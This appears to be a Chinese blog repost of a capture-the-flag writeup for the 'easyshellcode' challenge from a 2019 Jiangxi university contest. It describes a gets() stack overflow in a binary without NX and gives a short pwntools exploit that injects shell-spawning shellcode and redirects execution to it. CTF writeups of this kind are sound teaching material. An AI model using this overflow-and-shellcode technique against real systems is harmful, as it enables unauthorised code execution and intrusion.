欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

火种CTF 2019年江西高校网络安全大赛 PWN easyshellcode writeup

程序员文章站 2022-06-06 14:46:16
...

检查一下程序保护机制

火种CTF 2019年江西高校网络安全大赛 PWN easyshellcode writeup

没有开启NX,也有RWX可读可写可执行的段
将程序拖入IDA

火种CTF 2019年江西高校网络安全大赛 PWN easyshellcode writeup
可以看到gets(&s)这里存在溢出漏洞,会将s字符复制0x64字节给buf2
利用思路:
**将shellcode写到&s,再填充A覆盖只EIP填入buf2的地址
**这样执行EIP的时候即是执行buf2里面的shellcode

获取到buf2的地址
火种CTF 2019年江西高校网络安全大赛 PWN easyshellcode writeup
exploit如下:

#coding:utf-8
from pwn import *

sh = process('./easyshellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804A060
sh.sendline(shellcode+"A"*(112-len(shellcode))+ p32(buf2_addr))
sh.interactive()

欢迎爱好CTF的小伙伴一起交流